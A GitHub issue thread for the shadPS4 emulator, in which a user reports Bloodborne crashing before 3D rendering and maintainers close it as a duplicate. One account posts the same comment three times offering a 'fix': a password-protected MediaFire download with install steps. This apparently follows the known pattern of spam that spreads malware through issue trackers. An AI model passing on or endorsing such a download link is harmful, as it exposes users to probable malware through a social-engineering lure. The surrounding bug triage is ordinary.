### ISSUE TITLE
Bloodborne rtx 4070 Ryzen 5600x shadps4 Crash

### ISSUE THREAD

**Issue by LuisCasillas2710** [shadps4-emu/shadPS4#727] opened 2024-09-02 00:29 UTC
![Captura de pantalla 2024-09-01 182832](https://github.com/user-attachments/assets/51775d73-61f1-47ac-bc8a-22c72e81397a)

**Comment by LuisCasillas2710** [comment] 2024-09-02 00:31
It doesn't render anything in 3D. Crashea just before showing 3d. Help me

**Comment by goncastrum** [comment] 2024-09-02 00:31
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by StevenMiller123** [comment] 2024-09-02 00:33
Duplicate of https://github.com/shadps4-emu/shadPS4/issues/713.

**Comment by goncastrum** [comment] 2024-09-02 00:34
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-02 00:37
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Jaswanth-Vardireddy** [comment] 2024-09-02 02:35
I got the exact same purple error. Idk how to fix it.

**Comment by h16033** [comment] 2024-09-03 17:40
Which version of the emulator you used

**Comment by Hermiten** [comment] 2024-10-01 16:09
Duplicate of https://github.com/shadps4-emu/shadPS4/issues/713

**Closed as completed by Hermiten** 2024-10-01 16:09 UTC
